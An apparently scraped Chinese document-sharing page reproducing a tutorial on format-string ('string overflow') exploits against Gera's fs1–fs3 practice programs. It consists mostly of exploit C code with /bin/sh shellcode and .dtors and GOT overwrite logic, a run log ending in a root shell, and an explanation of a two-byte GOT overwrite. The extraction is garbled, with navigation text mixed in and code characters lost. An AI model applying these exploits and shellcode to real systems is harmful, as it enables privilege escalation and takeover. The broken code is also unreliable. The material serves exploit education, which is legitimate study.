《字符串溢出攻击》由会员分享,可在线阅读,更多相关《字符串溢出攻击(23页珍藏版)》请在金锄头文库上搜索。
1、Google Search首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们 添加文章 English Version 文章文章分类分类 专题文章漏洞分析安全配置黑客教学编程编程技术技术 #include #include /* May need some tweaking */#define ZERO_ADDRESS 0xbffefeca/* 24 bytes shellcode */char shellcode=“x31xc0x50x68x2fx2fx73x68x68x2fx62x69“x6ex89xe3x50x53x89xe1x99xb0x0bxcdx80“;in
2、t main(void) char *env3 = shellcode, NULL;char evil_buffer65536 + 1 ;char *p;int ret = 0xbffffffa - strlen(shellcode) -strlen(“/home/user/gera/fs1“);int i;printf(“Shellcode address: 0x%xn“, ret);/* Constructing the buffer */p = evil_buffer;memset(p, A, 256);p += 256;*(void *)p) = (void *) (ZERO_ADDR
3、ESS);p += 4;/* 16319 x 4 = 65276 */for(i = 0; i #include #include #define OBJDUMP “/usr/bin/objdump“#define VICTIM “/home/user/gera/fs2“#define GREP “/bin/grep“/* 24 bytes shellcode */char shellcode=“x31xc0x50x68x2fx2fx73x68x68x2fx62x69“x6ex89xe3x50x53x89xe1x99xb0x0bxcdx80“;int main(void) char *env3
4、 = shellcode, NULL;unsigned int first_half, second_half;char evil_buffer_165500, evil_buffer_265500, temp_buffer64;char *p;int dtors;int ret = 0xbffffffa - strlen(shellcode) -strlen(“/home/user/gera/fs2“);FILE *f;printf(“Shellcode address: 0x%xn“, ret);/* Splitting shellcode address in two */first_h
5、alf = (ret printf(“nShellcode address - first half : 0x%x, %un“, first_half,first_half);second_half = ret printf(“Shellcode address - second half: 0x%x, %un“, second_half,second_half);sprintf(temp_buffer, “%s -t %s | %s dtors“, OBJDUMP, VICTIM, GREP);f = popen(temp_buffer, “r“);if( fscanf(f, “%x“, p
6、rintf(“Error: Cannot find .dtors address!n“);exit(1);dtors += 4;printf(“.dtors address is: 0x%xnn“, dtors);/* First buffer writes first half of shellcode address*/p = evil_buffer_1;*(void *)p) = (void *) (dtors + 2);p += 4;/* 4 for .dtors addres and 2 for %c%c */memset(p, A, (first_half - 4 - 2);p +
7、= (first_half - 4 - 2);*p = 0;/* Second buffer writes second half of shellcode address*/p = evil_buffer_2;*(void *)p) = (void *) (dtors);p += 4;/* 4 for .dtors addres and 2 for %c%c */memset(p, B, (second_half - 4 - 2);p += (second_half - 4 - 2);*p = 0;execle(“/home/user/gera/fs2“, “fs2“, evil_buffe
8、r_1, evil_buffer_2,NULL, env);运行如下:userCoreLabs:/gera$ gcc fs2.c -o fs2userCoreLabs:/gera$ gcc exp_fs2.c -o exp_fs2userCoreLabs:/gera$ ./exp_fs2Shellcode address: 0xbfffffcdShellcode address - first half : 0xbfff, 49151Shellcode address - second half: 0xffcd, 65485.dtors address is: 0x8049590sh-2.05
9、# exitexituserCoreLabs:/gera$下面是例子溢出时 heap memory 的情况:/ | | | | | |GOT | | | | | | |_| |_| |_| / | 0x00000000 | | 0xb f f f 0000 | | 0xb f f f f f c d |.dtors |-| |-| |-| | 0xf f f f f f f f | | 0xf f f f f f f f | | 0xf f f f f f f f | |-| |-| |-|/ | 0x00000000 | | 0x00000000 | | 0x00000000 |.ctors
10、 |-| |-| |-| | 0xf f f f f f f f | | 0xf f f f f f f f | | 0xf f f f f f f f |-| |-| |-| | | | | |Before first snprintf() After first snprintf() After second snprintf()fs3.c 分析例子的源代码如下:/* fs3.c * specially crafted to feed your brain by riqcore- */* Not enough resources? */int main(int argv,char *arg
11、c) char buf256;snprintf(buf,sizeof buf,“%s%c%c%hn“,argc1);看起来与 fs2.c 非常相像。不同之处在于,攻击者只能在内存中写入两个字节,不足一个确切内存地址(在 32 位 IA 上需要 4 字节)。如果攻击者够聪明的话,他将在适当的地址覆盖两字节(比如,shellcode 的地址在 0xb f f f f f b a,某个返回地址是 0x b f f f a b c d,那么他将仅仅用 ffba 去覆盖 abcd)。这是攻击者要覆盖的。这里有一些可能性。首先 fs3 的返回地址(在栈上-0xb f f f x x x x 确定)将因为不
12、同的环境变量压栈而变的难于猜测。其次snprintf()的返回地址(同样在栈上-0xb f f f x x x x 确定)也很难猜测。heap 上的地址可以确定(可以从 bin 文件得到)。第三种方法就是覆盖.dtors 的地址。然后这并不会起很大的作用。看看 fs2.c 的那个图就知道。0x00000000 的地址经过覆盖后,变成了 0x0000f f b a 或 0xb f f f0000 之一-在这里完全没有用。那么现在剩下的唯一可能的方法就是覆盖 GOT 中的_deregister_frame_info()的地址:userCoreLabs:/gera$ objdump -R ./fs3
13、./fs3: file format elf32-i386DYNAMIC RELOCATION RECORDSOFFSET TYPE VALUE080495cc R_386_GLOB_DAT _gmon_start_080495bc R_386_JUMP_SLOT _register_frame_info080495c0 R_386_JUMP_SLOT _deregister_frame_info080495c4 R_386_JUMP_SLOT _libc_start_main080495c8 R_386_JUMP_SLOT snprintfuserCoreLabs:/gera$这种覆盖_deregister_frame_info()地址的技术是 Core
